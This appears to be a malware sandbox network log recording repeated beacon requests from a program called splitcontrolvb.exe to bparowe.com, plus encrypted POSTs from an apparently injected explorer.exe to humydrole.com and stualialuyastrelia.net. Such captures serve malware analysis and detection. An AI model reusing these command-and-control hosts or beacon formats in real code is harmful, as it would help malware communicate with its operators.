                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:41.318901062 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:41 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                281192.168.2.459512185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:41.760926008 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:42.038202047 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:41 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                282192.168.2.459513185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:42.470820904 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:42.750189066 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:42 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                283192.168.2.459514185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:43.216480970 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:43.502724886 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:43 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                284192.168.2.459515185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:43.996119022 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:44.275409937 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:44 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                285192.168.2.459516185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:44.696099043 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:44.969832897 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:44 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                286192.168.2.459517185.196.8.2280
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:45.431622028 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:45.712055922 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:45 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                287192.168.2.459518185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:46.132936954 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:46.411335945 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:46 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                288192.168.2.459519211.168.53.110802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:46.238327980 CET284OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://jsglrnwsogbwk.net/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 262
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:46.238363028 CET262OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 56 46 a4 aa
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA .[k,vuVFLUpXro9DWJ9oX6(2)<\*>Ieuw0E1#\'TP@cW2v3EVu#OY12Jq`?
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:47.391896009 CET252INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:46 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                                                                                                                                                                                                Data Ascii: r


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                289192.168.2.459520185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:46.883117914 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:47.162194014 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:47 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                290192.168.2.459521185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:49.611923933 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:49.890918970 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:49 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                291192.168.2.459522185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:50.344955921 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:50.624885082 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:50 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                292192.168.2.459523185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:51.059477091 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:51.338749886 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:51 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                293192.168.2.459524185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:51.804999113 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:52.081681967 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:51 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                294192.168.2.459525185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:52.488434076 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:52.767663956 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:52 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                295192.168.2.459526185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:53.184092999 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:53.463715076 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:53 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                296192.168.2.459527185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:53.943723917 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:54.223172903 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:54 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                297192.168.2.45952891.215.85.17802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:54.136830091 CET280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://myrcnthvpveoo.net/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:54.136851072 CET109OUTData Raw: 48 9d 8e cc 3b 67 52 24 2a 0a 26 27 7e ac 56 cb 5e 66 e8 16 fd 6a d7 aa c6 6c a0 86 76 f7 a7 96 fb ad fb c4 03 46 ee b1 a7 5e 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                                Data Ascii: H;gR$*&'~V^fjlvF^j~_=;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:54.427231073 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:54 GMT
